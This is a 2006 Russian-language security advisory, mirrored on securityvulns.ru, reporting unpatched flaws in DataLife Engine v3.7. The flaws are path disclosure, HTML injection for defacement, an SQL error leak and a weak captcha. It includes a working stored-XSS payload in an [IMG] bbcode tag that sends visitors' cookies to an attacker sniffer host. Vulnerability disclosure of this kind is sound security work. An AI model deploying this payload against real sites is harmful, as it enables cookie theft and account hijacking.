Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [eVuln] Skull-Splitter's PHP Downloadcounter for Wallpapers SQL Injection

  [eVuln] Skull-Splitter's PHP Guestbook XSS Vulnerability

  XSS in PHPKIT Version 1.6.03

  [SA19443] PHP Script Index "search" Cross-Site Scripting Vulnerability

From:LTK <ltk_28_(at)_mail.ru>
Date:29.03.2006
Subject:advisory DATALIFE engine

-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
_-_-_-_-_-_-_-_
/\
\/                      DataLife Engine v.3.7 SoftNews Media Group advisory

Программный продукт     :  DataLife Engine v.3.7 SoftNews Media Group
Текущее состояние       :  ** UNPATCHED **
Найдена                 :  LTK
Дата написания          :  29nd March, 2006
Тестировалось           :  ;)

Детали :

[Раскрытие установочного пути]

В parse.class.php выделено 12582912 байт на проверку сообщения.
Переполнение делается так: "<<><><><><><>>"

[Управление генерированием страниц]

На некоторых системах удалось выполнять простые html теги :
<br></td><plaintext></td><hr><form><input>

Что может сказаться на внешнем виде сайта, ака deface по быстрому.

[ХСС]

Угнать кукисы можно при помощи вставки картинки.
[img][/img] -- этим можно воспользваться всегда, даже если нету таких кнопок при
добавлении новости, личном сообщении, добавления коментария.
Непосредственно сама ХСС:

[IMG=left]http://anyimage.com/ok.gif" onmouseover='document.location=" class="fixed">http://your.sniffer.com/sniff/sniff.gif?id="+document.
cookie;'><!--[/IMG]

Если установлен форум, то куки приходят и от него.

[Проблемы с SQL]
http://target.net/category/topic/ -- где topic -- это не существующая тема.
Результат: SELECT id FROM nws_category WHERE parentid=not detected ;
Может, народные умельцы, в скором времени, что и придумают.  :р

[antibot]
antibot.php не справляеться со своей задачей, при одновременном коннетке
он выдаёт одинаковые картинки.

[Greets ]
       OrkzRule

/\      ltk_28@mail.ru   ICQ: 200-255-251
\/      
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
_-_-_-_-_-_-_-_

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru